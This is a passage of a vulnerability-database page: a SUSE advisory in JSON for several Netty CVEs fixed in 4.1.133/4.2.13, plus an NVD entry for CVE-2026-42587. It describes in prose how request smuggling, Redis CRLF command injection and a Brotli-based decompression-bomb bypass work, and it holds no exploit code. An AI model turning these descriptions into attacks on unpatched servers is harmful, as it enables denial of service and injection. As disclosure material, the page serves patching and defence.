"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42583"
},
{
"cve": "CVE-2026-42584",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42584"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpClientCodec pairs each inbound response with an outbound request by queue.poll() once per response, including for 1xx. If the client pipelines GET then HEAD and the server sends 103, then 200 with GET body, then 200 for HEAD, the queue pairs HEAD with the first 200. The HEAD rule then skips reading that message\u0027s body, so the GET entity bytes stay on the stream and the following 200 is parsed from the wrong offset. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42584",
"url": "https://www.suse.com/security/cve/CVE-2026-42584"
},
{
"category": "external",
"summary": "SUSE Bug 1265280 for CVE-2026-42584",
"url": "https://bugzilla.suse.com/1265280"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.6,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:L/I:L/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-42584"
},
{
"cve": "CVE-2026-42585",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42585"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, Netty incorrectly parses malformed Transfer-Encoding, enabling request smuggling attacks. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42585",
"url": "https://www.suse.com/security/cve/CVE-2026-42585"
},
{
"category": "external",
"summary": "SUSE Bug 1265291 for CVE-2026-42585",
"url": "https://bugzilla.suse.com/1265291"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 6.5,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-42585"
},
{
"cve": "CVE-2026-42586",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42586"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the Netty Redis codec encoder (RedisEncoder) writes user-controlled string content directly to the network output buffer without validating or sanitizing CRLF (\\r\\n) characters. Since the Redis Serialization Protocol (RESP) uses CRLF as the command/response delimiter, an attacker who can control the content of a Redis message can inject arbitrary Redis commands or forge fake responses. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42586",
"url": "https://www.suse.com/security/cve/CVE-2026-42586"
},
{
"category": "external",
"summary": "SUSE Bug 1265245 for CVE-2026-42586",
"url": "https://bugzilla.suse.com/1265245"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 8.2,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:H/A:N",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42586"
},
{
"cve": "CVE-2026-42587",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-42587"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-42587",
"url": "https://www.suse.com/security/cve/CVE-2026-42587"
},
{
"category": "external",
"summary": "SUSE Bug 1265246 for CVE-2026-42587",
"url": "https://bugzilla.suse.com/1265246"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 7.5,
"baseSeverity": "HIGH",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "important"
}
],
"title": "CVE-2026-42587"
},
{
"cve": "CVE-2026-44248",
"ids": [
{
"system_name": "SUSE CVE Page",
"text": "https://www.suse.com/security/cve/CVE-2026-44248"
}
],
"notes": [
{
"category": "general",
"text": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, the MQTT 5 header Properties section is parsed and buffered before any message size limit is applied. Specifically, in MqttDecoder, the decodeVariableHeader() method is called before the bytesRemainingBeforeVariableHeader \u003e maxBytesInMessage check. The decodeVariableHeader() can call other methods which will call decodeProperties(). Effectively, Netty does not apply any limits to the size of the properties being decoded. Additionally, because MqttDecoder extends ReplayingDecoder, Netty will repeatedly re-parse the enormous Properties sections and buffer the bytes in memory, until the entire thing parses to completion. This can cause high resource usage in both CPU and memory. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.",
"title": "CVE description"
}
],
"product_status": {
"recommended": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
},
"references": [
{
"category": "external",
"summary": "CVE-2026-44248",
"url": "https://www.suse.com/security/cve/CVE-2026-44248"
},
{
"category": "external",
"summary": "SUSE Bug 1265293 for CVE-2026-44248",
"url": "https://bugzilla.suse.com/1265293"
}
],
"remediations": [
{
"category": "vendor_fix",
"details": "To install this SUSE Security Update use the SUSE recommended installation methods like YaST online_update or \"zypper patch\".\n",
"product_ids": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"scores": [
{
"cvss_v3": {
"baseScore": 5.3,
"baseSeverity": "MEDIUM",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:L",
"version": "3.1"
},
"products": [
"openSUSE Tumbleweed:netty-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-bom-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-javadoc-4.1.133-1.1.x86_64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.aarch64",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.ppc64le",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.s390x",
"openSUSE Tumbleweed:netty-parent-4.1.133-1.1.x86_64"
]
}
],
"threats": [
{
"category": "impact",
"date": "2026-05-16T00:00:00Z",
"details": "moderate"
}
],
"title": "CVE-2026-44248"
}
]
}
FKIE_CVE-2026-42587
Vulnerability from fkie_nvd - Published: 2026-05-13 19:17 - Updated: 2026-05-18 12:20
Severity ?
Summary
Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final.
References
| URL | Tags | ||
|---|---|---|---|
| security-advisories@github.com | https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv | Exploit, Mitigation, Vendor Advisory | |
| 134c704f-9b21-4f2e-91b3-4a467353bcc0 | https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv | Exploit, Mitigation, Vendor Advisory |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE205A5-2C43-40C9-A2FF-CF6759B8D861",
"versionEndExcluding": "4.1.133",
"vulnerable": true
},
{
"criteria": "cpe:2.3:a:netty:netty:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D94A720F-9CED-4BE9-8C37-FD9E2FD28472",
"versionEndExcluding": "4.2.13",
"versionStartIncluding": "4.2.0",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
}
]
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Netty is an asynchronous, event-driven network application framework. Prior to 4.2.13.Final and 4.1.133.Final, HttpContentDecompressor accepts a maxAllocation parameter to limit decompression buffer size and prevent decompression bomb attacks. This limit is correctly enforced for gzip and deflate encodings via ZlibDecoder, but is silently ignored when the content encoding is br (Brotli), zstd, or snappy. An attacker can bypass the configured decompression limit by sending a compressed payload with Content-Encoding: br instead of Content-Encoding: gzip, causing unbounded memory allocation and out-of-memory denial of service. The same vulnerability exists in DelegatingDecompressorFrameListener for HTTP/2 connections. This vulnerability is fixed in 4.2.13.Final and 4.1.133.Final."
}
],
"id": "CVE-2026-42587",
"lastModified": "2026-05-18T12:20:06.340",
"metrics": {
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 7.5,
"baseSeverity": "HIGH",
"confidentialityImpact": "NONE",
"integrityImpact": "NONE",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"version": "3.1"
},
"exploitabilityScore": 3.9,
"impactScore": 3.6,
"source": "security-advisories@github.com",
"type": "Secondary"
}
]
},
"published": "2026-05-13T19:17:24.460",
"references": [
{
"source": "security-advisories@github.com",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
},
{
"source": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"tags": [
"Exploit",
"Mitigation",
"Vendor Advisory"
],
"url": "https://github.com/netty/netty/security/advisories/GHSA-f6hv-jmp6-3vwv"
}
],
"sourceIdentifier": "security-advisories@github.com",
"vulnStatus": "Analyzed",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-400"
}
],
"source": "security-advisories@github.com",
"type": "Primary"
}
]
}
Loading…
Trend slope:
-
(linear fit over daily sighting counts)
Show additional events:
Loading…
Experimental. This forecast is provided for visualization only and may change without notice. Do not use it for operational decisions.
